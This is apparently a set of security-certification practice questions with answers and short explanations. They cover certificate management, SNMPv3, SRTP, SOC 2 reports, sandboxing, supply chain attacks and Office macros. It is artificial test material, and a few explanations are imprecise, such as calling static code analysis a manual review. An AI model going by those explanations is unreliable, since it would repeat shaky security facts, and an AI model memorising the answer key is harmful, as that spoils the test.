Weak encryption Weak encryption vulnerabilities allow unauthorized access to data. An algorithm used for encryption may have known weaknesses that allow brute-force enumeration.

A system administrator applies a Windows patch to the virtual machines (VM) in a virtual desktop infrastructure (VDI). After the patch is complete, the VMs no longer authenticate with the server. Which of the following is the best next step to take for the system administrator? -Execute penetration test. -Complete a vulnerability scan. -Take a snapshot. -Revert to last known good configuration.

Revert to last known good configuration. The administrator should revert to the last known good configuration before the patch. The virtual machines (VM) were working before the patch. Reverting to the last known good configuration will get the system back up and running.

Recommend an immediate response that does not require generating new certificates in a scenario where an attacker has compromised a host on a network by spoofing digital certificates. Install a content filter Revoke the host's certificate Remove all root certificates from host Install a data loss prevention system

Revoke the host's certificate Certificate revocation must always be performed if the associated host is compromised. The Key Compromise property of the certification can allow it to be rekeyed to retain the same subject and expiry information.

A global corporation assesses risk appetite and how risks in various regions could influence mission-critical operations. They are assessing compliance with local laws and licensing requirements to prevent financial risk or resolve security risks, and changing the risk posture and implementing risk controls to compensate. Conclude what type of assessment the team is performing. Risk control assessment Site risk assessment Penetration testing Vulnerability assessment

Risk control assessment Risk and control self-assessment (RCSA) is the method by which companies evaluate and analyze the operational risks and the efficacy of the controls used to manage them.

Analyze the methods and determine which a technician uses as a non-persistent recovery method on a server using a system baseline. -Build from a template -Live boot media -Revert to known state -Rollback to known configuration

Rollback to known configuration Rollback to known configuration is a mechanism for restoring a baseline system configuration, such as Windows System Restore.

An electrical cooperative startup needs the ability to monitor energy use, collect data taken from the monitoring, and use the data to lower costs and energy waste. Which component of an industrial control system (ICS) would be the best solution for the cooperative? -MSP -RTOS -SCADA -TACACS+

SCADA Supervisory control and data acquisition (SCADA) is part of an industrial control system (ICS) and is used for gathering and analyzing real-time data. A SCADA aids industry in making data-driven decisions based on reporting and analytics.

A network uses a framework for management and monitoring that uses the Data Encryption Standard (DES) and the Advanced Encryption Standard (AES), which encrypts the contents of traps and query responses. Analyze the types of protocols available for management and monitoring, then deduce the protocol utilized. -SNMPv2c -SNMPv1 -MIB -SNMPv3

SNMPv3 Simple Network Management Protocol (SNMP) v3 supports encryption and strong user-based authentication. Instead of community names, the agent is configured with a list of usernames and access permissions.

An IT technician at a London-based company is setting up a new VoIP system in the CEO's office. The CEO has asked the technician to set up encryption for calls and informs the CEO that session-to-session encryption is implemented at the endpoints. The CEO wants not only the session encrypted but also the call data itself. Recommend a protocol that will encrypt VoIP call data. -SFTP -HTTPS -SRTP -SIPS

SRTP SRTP, which stands for Secure Real-time Transport Protocol, provides encryption and authentication for RTP (Real-Time Protocol) data in unicast and multicast data flows. SRTP will encrypt all data sent and received by each SIP endpoint for the entire journey.

The virtual teleconference room has a Session Initiation Protocol (SIP) endpoint for communication with remote branch offices. Company policy requires the VTC components use secure session and call data before others can use it. Which of the following protocols will provide encryption for the call data? -SRTP -ESP -SIPS -HTTPS

SRTP Secure Real-time Transport Protocol (SRTP) is an encryption protocol that provides confidentiality for the actual call data.

Finance representatives at an organization meet professional standards by providing reports that are highly detailed and designed to be restricted. As members of the American Institute of Certified Public Accountants (AICPA), which standards do the finance representatives follow? -SSAE SOC 2 Type III -International Organization for Standardization (ISO) 31000 -International Organization for Standardization (ISO) 27K -SSAE SOC 2 Type II

SSAE SOC 2 Type II A Service Organization Control (SOC2) Type II report assesses the ongoing effectiveness of the security architecture over a period of 6-12 months. SOC2 reports are highly detailed and designed to be restricted.

Cuckoo is a software package that provides a system configuration allowing the system to be completely isolated from its host. It provides a safe environment for potentially dangerous research, such as on malware, while recording file system and registry changes, as well as network activity. What is this type of isolated system called? -Vulnerability test -ARP cache -Sandbox -Exploitation framework

Sandbox A sandbox, such as Cuckoo, is an isolated environment created to safely analyze malware and exploits. Sandboxing is an isolation technique commonly used in cybersecurity research, particularly malware research.

Which of the following practices would help mitigate the oversight of applying coding techniques that will secure the code of an internal application for a company? -Input validation -Dead code removal -Static code analysis -Normalization

Static code analysis Static code analysis is the manual review of code to identify oversights, mistaken assumptions, or a lack of knowledge or experience. This may ensure security or improve the code depending on who is peer-reviewing it.

Which aspect of certificate and key management should an administrator consider when trying to mitigate or prevent the loss of private keys? -Revocation -Storage -OCSP -Expiration

Storage Private keys or certificates must be securely stored to prevent unauthorized use and loss. The certificate authority that creates the key pair must provide strict access control to the database and maybe even data-at-rest encryption.

A cellular company updates cell towers across the country. They plan to update the baseband of their mobile users, to fully support the new towers. How may the company effectively deploy this new update? -Send updates over Wi-Fi -Via USB -Add to next android version -Send updates through OTA

Send updates through OTA OTA (over the air) refers to the process of updating basebands on mobile devices through the cellular network. This option is more effective and efficient and requires very little interaction by the user.

How might responsibilities be divided among individuals to prevent abuse of power in an organization? -Separation of duties -Clean desk space -Job rotation -Least privilege

Separation of duties Separation of duties is a means of establishing checks and balances against the possibility that critical systems or procedures can be compromised by insider threats. Divided duties among individuals prevent ethical conflicts or abuses of power.

A developer uses a prepackaged set of tools that includes documentation, application programming interfaces (APIs), code samples, and libraries to easily integrate an application with the company Linux operating system. Which secure coding process is the developer using? Software development kit (SDK) Code reuse APIs Stored procedure

Software development kit (SDK) A software development kit (SDK) provides developers a prepackaged set of tools, libraries, documentation, and code samples to create software applications on a specific platform.

A recent attack on a major retail chain reported that customers' private information, including credit card information, was stolen. The report explained that a heating, ventilation, and air conditioning (HVAC) contractor copied the information to an external hard drive while servicing an air conditioner unit, and later uploaded the data to a cloud storage resource. A security engineer would classify this type of attack as which of the following? -Cloud-based attack -Birthday attack -USB cable attack -Supply chain attack

Supply chain attack A supply chain attack involves a threat actor seeking methods to infiltrate a company in its supply chain. A heating, ventilation, and air conditioning (HVAC) supplier is one example of using a maintenance service to gain access to sensitive areas like a datacenter.

An organization wants to implement a certificate on a website domain. The organization prepares for a rigorous check to prove its identity using extended validation. Evaluate the options and conclude why the certificate would not be issued. -A TXT record is used for verification. -Multiple root CAs are trusted. -The domain uses a wildcard. -The root CA is offline.

The domain uses a wildcard. Extended Validation (EV) is a proof of ownership process that requires rigorous checks on the subject's legal identity and control over a domain. An EV certificate cannot be issued for a wildcard domain.

A company is looking into integrating on-premise services and cloud services with a cloud service provider (CSP) using an Infrastructure as a Service (IaaS) plan. As a cloud architect works on architectural design, which of the following statements would NOT apply in this case? -The provider is responsible for the availability of the software. -The provider must update the firmware and security patches of physical servers. -The company must establish separation of duties mechanisms. -The company is liable for legal and regulatory requirements for customer data.

The provider is responsible for the availability of the software. In a Software as a Service (SaaS) plan, the provider is responsible for the availability of the software. The software may include an appliance with Windows Server 2016 already installed and available to use.

Flow analysis tools, such as IPFIX or Netflow, collect metadata about network traffic without capturing each frame. Evaluate the type of analysis that uses these tools. -Packet analysis -Log analysis -Trend analysis -Vulnerability analysis

Trend analysis Since flow analyzers gather metadata and statistics about network traffic, they are commonly used to visualize traffic statistics in order to assist in identifying trends.

A company with offices in multiple countries deployed a cyber threat intelligence (CTI) appliance in the cloud to detect network attacks. The security team examined last week's data and spent a significant amount of time trying to better predict future attacks and ways to improve security. How can the team take advantage of cloud resources to better analyze these threats? -Use OSINT -Use proprietary software -Use code repositories -Use artificial intelligence

Use artificial intelligence Artificial intelligence (AI), especially machine learning, is available with cloud service providers (CSP) such as the Google Cloud Platform. AI can help analyze threat data in real-time to make better predictions, and initiate workflows to stop attacks as they happen.

A hacker can use Microsoft Office applications as an attack vector to automatically run multiple tasks in the background using which of the following? -PowerShell -Bash -VBA -ARP poisoning

VBA Microsoft Office uses the Visual Basic for Applications (VBA) languages to script macros, for example, in a Word document to carry out multiple tasks automatically.